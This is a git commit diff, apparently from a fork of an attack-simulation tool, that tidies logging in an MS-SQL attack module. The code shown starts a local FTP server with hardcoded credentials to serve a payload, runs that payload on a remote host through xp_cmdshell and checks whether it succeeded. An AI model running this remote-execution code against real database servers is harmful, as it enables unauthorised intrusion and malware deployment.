forked from p15670423/monkey
* Finalized the MS-SQL code
* Changed the log to the right handle and added exceptions info. * better docs and some pep 8
This commit is contained in:
parent
149525d205
commit
b46810e02b
|
@ -1,5 +1,6 @@
|
||||||
from os import path
|
from os import path
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
import pymssql
|
import pymssql
|
||||||
|
|
||||||
import mssqlexec_utils
|
import mssqlexec_utils
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import multiprocessing
|
import multiprocessing
|
||||||
import logging
|
import logging
|
||||||
|
@ -11,12 +10,17 @@ from pyftpdlib.handlers import FTPHandler
|
||||||
from pyftpdlib.servers import FTPServer
|
from pyftpdlib.servers import FTPServer
|
||||||
|
|
||||||
|
|
||||||
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
|
||||||
FTP_SERVER_PORT = 1026
|
FTP_SERVER_PORT = 1026
|
||||||
FTP_SERVER_ADDRESS = ''
|
FTP_SERVER_ADDRESS = ''
|
||||||
FTP_SERVER_USER = 'brute'
|
FTP_SERVER_USER = 'brute'
|
||||||
FTP_SERVER_PASSWORD = 'force'
|
FTP_SERVER_PASSWORD = 'force'
|
||||||
FTP_WORKING_DIR = '.'
|
FTP_WORKING_DIR = '.'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class FTP:
|
class FTP:
|
||||||
|
|
||||||
|
@ -131,12 +135,12 @@ class CmdShellAttack(AttackHost):
|
||||||
for cmd in shellcmds:
|
for cmd in shellcmds:
|
||||||
self.cursor.execute(cmd)
|
self.cursor.execute(cmd)
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
logging.error('Error sending the payload using xp_cmdshell to host: {0}'.format(e.message))
|
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
return False
|
return False
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
logging.error("Couldn't establish an FTP server for the dropout")
|
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def execute_payload(self):
|
def execute_payload(self):
|
||||||
|
@ -151,27 +155,27 @@ class CmdShellAttack(AttackHost):
|
||||||
# Getting the payload's file name
|
# Getting the payload's file name
|
||||||
payload_file_name = os.path.split(self.payload_path)[1]
|
payload_file_name = os.path.split(self.payload_path)[1]
|
||||||
|
|
||||||
# Preparing the cmd to run on remote, using no_output so i can capture exit code: 0 -> success, 1 -> error.
|
# Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
|
||||||
shellcmd = """DECLARE @i INT \
|
shellcmd = """DECLARE @i INT \
|
||||||
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
||||||
SELECT @i """.format(payload_file_name)
|
SELECT @i """.format(payload_file_name)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
# Executing payload on remote host
|
# Executing payload on remote host
|
||||||
logging.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||||
self.cursor.execute(shellcmd)
|
self.cursor.execute(shellcmd)
|
||||||
if self.cursor.fetchall()[0][0] == 0:
|
if self.cursor.fetchall()[0][0] == 0:
|
||||||
# Success
|
# Success
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
logging.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
logging.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
return False
|
return False
|
||||||
|
|
||||||
except pymssql.OperationalError:
|
except pymssql.OperationalError:
|
||||||
logging.error('Executing payload: {0} failed'.format(payload_file_name))
|
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
|
||||||
self.ftp_server_p.terminate()
|
self.ftp_server_p.terminate()
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@ -189,10 +193,10 @@ class CmdShellAttack(AttackHost):
|
||||||
multiprocessing.log_to_stderr(logging.DEBUG)
|
multiprocessing.log_to_stderr(logging.DEBUG)
|
||||||
p = multiprocessing.Process(target=ftp_s.run_server)
|
p = multiprocessing.Process(target=ftp_s.run_server)
|
||||||
p.start()
|
p.start()
|
||||||
logging.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||||
return ftp_s, p
|
return ftp_s, p
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
logging.error('Exception raised while trying to pull up the ftp server: {0}'.format(e.message))
|
LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
|
||||||
return None, None
|
return None, None
|
||||||
|
|
||||||
def __find_own_ip(self):
|
def __find_own_ip(self):
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
dir c:\>c:\tmp\dir.txt
|
Loading…
Reference in New Issue